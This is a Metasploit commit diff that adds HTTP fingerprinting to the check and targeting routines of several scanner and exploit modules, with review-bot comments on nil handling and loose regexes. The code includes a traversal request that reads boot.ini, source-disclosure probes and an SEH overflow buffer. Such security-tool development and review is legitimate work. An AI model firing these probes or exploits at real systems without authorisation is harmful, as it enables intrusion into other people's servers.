add http_fingerprint calls to modules that use various headers

git-svn-id: file:///home/svn/framework3/trunk@9627 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-06-25 20:53:12 +00:00
parent 2ab5983e2a
commit 12fbdcd878
16 changed files with 167 additions and 133 deletions


@ -42,11 +42,14 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
begin
res = send_request_raw({
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/',
}, 25)
http_fingerprint({ :response => res })
if (res and res.code == 200)
ver = ""
@ -133,4 +136,3 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
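Review bot: `http_fingerprint({ :response => res })` is called before the `if (res and res.code == 200)` guard, so when the request times out it receives a nil `:response`. The helper's handling of that is not shown on this page; if it falls back to sending its own request, as the argument-less calls elsewhere in this commit suggest it can, every silent host costs a second timeout, and otherwise it may raise. `http_fingerprint({ :response => res }) if res`, or moving the call inside the existing `if`, avoids both. The same ordering recurs in the sections requesting `/manager/html`, `/SecurityGateway.dll`, `/tiki-index.php` and `datastore['URL']`, in both `OPTIONS` checks, and in the `check`/`auto_target` pair where `if response.nil?` follows the call. `run_host` continues outside this hunk.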


@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -47,11 +45,14 @@ class Metasploit3 < Msf::Auxiliary
def run_host(target_host)
res = send_request_raw({
res = send_request_raw(
{
'uri' => '/activeupdate/../../../../../../../../../../../boot.ini',
'method' => 'GET',
}, 20)
http_fingerprint({ :response => res })
if (res.code >= 200)
if (res.body =~ /boot/)
vuln = "vulnerable."
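Review bot: `if (res.code >= 200)` dereferences `res` with no nil check, so a host that does not answer within the 20 second timeout raises NoMethodError instead of being skipped; `if (res and res.code >= 200)` fixes that. The test is also loose for a scanner: any status from 200 upward passes, and `res.body =~ /boot/` would match an error page that merely echoes the requested path, which is likely to produce false positives in the report. Requiring `res.code == 200` before the body match would tighten it. The body of `run_host` continues past the hunk.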


@ -22,10 +22,14 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'JBoss Vulnerability Scanner',
'Description' => %q{
This module scans a JBoss instance for vulnerablities.
This module scans a JBoss instance for a few vulnerablities.
},
'Version' => '$Revision$',
'Author' => [ 'Tyler Krpata' ],
'References' =>
[
[ 'CVE', '2010-0738' ] # VERB auth bypass
],
'License' => BSD_LICENSE
))
@ -39,14 +43,16 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
print_status("Processing IP #{ip}")
res = send_request_cgi({
res = send_request_cgi(
{
'uri' => "/"+Rex::Text.rand_text_alpha(12),
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
if (xpb = res.headers['X-Powered-By'])
print_status("X-Powered-By: #{xpb}")
end
info = http_fingerprint({ :response => res })
print_status(info)
if(res.body and />(JBoss[^<]+)/.match(res.body) )
print_status("JBoss error message: #{$1}")
end
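Review bot: `res` is used unchecked after `send_request_cgi`: `res.body` in the JBoss banner test (and `res.headers`, if that line is kept) raises NoMethodError when the host does not answer. An early `return if not res` right after the request would cover both. If `http_fingerprint` can return nil, `print_status(info)` prints an empty status line, so `print_status(info) if info` reads better. Separately, the description string spells "vulnerablities".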


@ -67,12 +67,16 @@ class Metasploit3 < Msf::Auxiliary
get_source = Rex::Text.uri_encode("::$data")
begin
res = send_request_raw({
res = send_request_raw(
{
'method' => 'GET',
'uri' => "/#{uri}#{get_source}",
}, 25)
version = res.headers['Server'] if res
if res
version = res.headers['Server']
http_fingerprint({ :response => res })
end
if vuln_versions.include?(version)
print_good("#{target_url} - nginx - Vulnerable version: #{version}")


@ -67,6 +67,7 @@ class Metasploit3 < Msf::Auxiliary
'uri' => "/manager/html",
'method' => 'GET'
}, 25)
http_fingerprint({ :response => res })
rescue ::Rex::ConnectionError => e
vprint_error("http://#{rhost}:#{rport}/manager/html - #{e}")
return


@ -43,6 +43,8 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200
http_fingerprint({ :response => res })
tserver = res.headers['Server']
if (res.headers['DAV'] == '1, 2') and (res.headers['MS-Author-Via'].match('DAV'))
@ -54,12 +56,13 @@ class Metasploit3 < Msf::Auxiliary
print_status("#{target_host} (#{tserver}) has #{wdtype} ENABLED")
report_note(
{
:host => target_host,
:proto => 'HTTP',
:port => rport,
:type => wdtype,
:data => 'enabled'
)
})
else
print_status("#{target_host} (#{tserver}) WebDAV disabled.")
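Review bot: `res.headers['MS-Author-Via'].match('DAV')` raises NoMethodError when a server sends `DAV: 1, 2` without an `MS-Author-Via` header, which aborts the scan of that host instead of reporting it. A nil-safe form is `(res.headers['MS-Author-Via'] =~ /DAV/)`. The enclosing method starts and ends outside these hunks.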


@ -117,21 +117,20 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
res = send_request_raw({
res = send_request_raw(
{
'method' => 'OPTIONS',
'proto' => 'HTTP',
'version' => '1.0',
'uri' => datastore['PATH']
}, 5)
if res and res['Server']
print_status("Found server: #{res['Server']}")
info = http_fingerprint({ :response => res })
if (info =~ /Sun/)
print_status("Found server: #{info}")
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def exploit
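Review bot: `if (info =~ /Sun/)` in `check` has no comment saying which banner it is meant to recognise, and a three-letter, unanchored pattern can match unrelated fingerprint text. I would add a comment such as `# Detected only when the fingerprint names a Sun server; everything else is reported Safe`. If the expected product string is known, match on that rather than the bare vendor name.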


@ -236,6 +236,8 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Safe
end
http_fingerprint({ :response => res })
if (res.code != 200)
print_status("The server returned #{res.code} #{res.message}")
return Exploit::CheckCode::Safe


@ -32,15 +32,13 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2002-1643' ],
[ 'OSVDB', '4468'],
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html']
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d",
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d"
},
'Targets' =>
[
@ -56,19 +54,20 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
res = send_request_raw({
res = send_request_raw(
{
'method' => 'OPTIONS',
'proto' => 'RTSP',
'version' => '1.0',
'uri' => '/'
}, 5)
info = http_fingerprint({ :response => res })
if res and res['Server']
print_status("Found RTSP: #{res['Server']}")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Safe
end
def exploit
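Review bot: `info = http_fingerprint({ :response => res })` in `check` assigns a value that, as far as the hunk shows, is never read; the method still decides on `res['Server']`. Either drop the assignment (`http_fingerprint({ :response => res })`) or use it, as the other `OPTIONS` check in this commit does with `print_status("Found server: #{info}")`. It is also not evident from the page that an HTTP fingerprint helper gives a meaningful result for a response obtained with `'proto' => 'RTSP'`, so a short comment on the intent would help.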


@ -61,7 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
res = send_request_raw({
res = send_request_raw(
{
'uri' => datastore['URI'] + "/tiki-index.php",
'method' => 'GET',
'headers' =>
@ -71,7 +72,9 @@ class Metasploit3 < Msf::Exploit::Remote
}
}, 5)
if (res and res.message == "OK" and res.body.match(/TikiWiki v?([0-9\.]*)/))
http_fingerprint({ :response => res })
if (res and res.code == 200 and res.body.match(/TikiWiki v?([0-9\.]*)/))
ver = $1
#print_status("Detected TikiWiki version #{ver}")
ver = ver.split('.')
@ -89,8 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit


@ -62,7 +62,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
res = send_request_raw({
res = send_request_raw(
{
'uri' => datastore['URI'] + "/tiki-index.php",
'method' => 'GET',
'headers' =>
@ -72,11 +73,12 @@ class Metasploit3 < Msf::Exploit::Remote
}
}, 25)
if (res and res.message == "OK" and res.body.match(/TikiWiki 1\.9\.4/))
http_fingerprint({ :response => res })
if (res and res.code == 200 and res.body.match(/TikiWiki 1\.9\.4/))
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit


@ -81,6 +81,8 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => '/SecurityGateway.dll'
}, 10)
http_fingerprint({ :response => res })
if (res and res.headers['Server'] =~ /SecurityGateway (1\..*)$/)
case $1
when /1\.0\.1/
@ -98,7 +100,6 @@ class Metasploit3 < Msf::Exploit::Remote
# handle auto-targeting
mytarget = target
if target.name =~ /Automatic/
mytarget = auto_target
if mytarget.nil?
raise RuntimeError, "Unable to automatically select a target"


@ -161,6 +161,8 @@ class Metasploit3 < Msf::Exploit::Remote
def check
response = send_request_raw({'uri' => '/'}, 5)
http_fingerprint({ :response => response })
if response.nil?
print_status("No response to request")
return Exploit::CheckCode::Safe
@ -194,6 +196,9 @@ class Metasploit3 < Msf::Exploit::Remote
def auto_target
response = send_request_raw({'uri' => '/'}, 5)
http_fingerprint({ :response => response })
targets_to_try = []
if response.nil?


@ -57,21 +57,28 @@ class Metasploit3 < Msf::Exploit::Remote
'DisclosureDate' => 'Aug 14 2007',
'DefaultTarget' => 0))
register_options([
register_options(
[
Opt::RPORT(80),
OptString.new('PATH', [ true, "Installation path of Easy Chat Server",
"C:\\Program Files\\Easy Chat Server" ])
], self.class )
end
def check
res = send_request_raw
if res and res['Server'] =~ /Easy Chat Server\/1.0/
return Exploit::CheckCode::Appears
def auto_target
info = http_fingerprint
t = nil
if (info =~ /Easy Chat Server\/1\.0/)
t = targets[0]
end
t
end
return Exploit::CheckCode::Safe
def check
if auto_target
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
@ -79,9 +86,10 @@ class Metasploit3 < Msf::Exploit::Remote
val = rand_text_alpha(rand(10) + 1)
num = rand_text_numeric(1)
# exploit buffer.
path = datastore['PATH'] + "\\users\\"
print_status("path: " + path)
# exploit buffer.
filler = rand_text_alpha(256 - path.length)
seh = generate_seh_payload(target.ret)
juju = filler + seh


@ -51,15 +51,12 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
response = send_request_raw
info = http_fingerprint
if response and
response['Server'] and
response['Server'] =~ /.*MailEnable/
if (info =~ /.*MailEnable/)
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit
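Review bot: The leading `.*` in `if (info =~ /.*MailEnable/)` does nothing, because `=~` already searches the whole string; `if (info =~ /MailEnable/)` says the same thing. `check` now appears to rely on `http_fingerprint` issuing its own request when no `:response` is passed, which this page does not show. A one-line comment stating that, for example `# http_fingerprint sends the request itself when no :response is given`, would help the next reader once confirmed against the mixin.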


@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
@ -35,11 +33,10 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-1134'],
[ 'OSVDB', '12258'],
[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html'],
[ 'BID', '11820'],
[ 'CVE', '2004-1134' ],
[ 'OSVDB', '12258' ],
[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html' ],
[ 'BID', '11820' ]
],
'Privileged' => false,
'DefaultOptions' =>
@ -70,38 +67,44 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
def check
res = send_request_raw({
def auto_target
res = send_request_raw(
{
'uri' => datastore['URL']
}, -1)
http_fingerprint({ :response => res })
# Was a vulnerable system detected?
t = nil
if (res and res.body =~ /Access Token/)
return Exploit::CheckCode::Vulnerable
case res.headers['Server']
when /5\.1/
t = targets[2]
else
t = targets[1]
end
end
t
end
return Exploit::CheckCode::Safe
def check
if auto_target
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
if (target.name =~ /Automatic/)
mytarget = auto_target
else
mytarget = target
if(mytarget.name =~ /Automatic/)
res = send_request_raw({
'uri' => datastore['URL']
}, -1)
# Was a vulnerable system detected?
if (res and res.body =~ /Access Token/)
case res.headers['Server']
when /5\.1/
mytarget = targets[2]
else
mytarget = targets[1]
end
else
print_error("No valid target found")
end
if not mytarget
raise RuntimeError, "No valid target found"
end
buf = rand_text_english(8192, payload_badchars)
@ -120,4 +123,3 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
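Review bot: `check` returns `Exploit::CheckCode::Vulnerable` whenever `auto_target` is non-nil, and `auto_target` keys only on `res.body =~ /Access Token/`, falling through to `targets[1]` for any `Server` header that lacks `5.1`. That is a page-content match rather than a version test, so `Exploit::CheckCode::Appears` would describe the evidence more accurately, as the Easy Chat Server and MailEnable checks in this commit do. `auto_target` would also benefit from a comment stating that it returns nil when nothing matches, since both `check` and `exploit` depend on that.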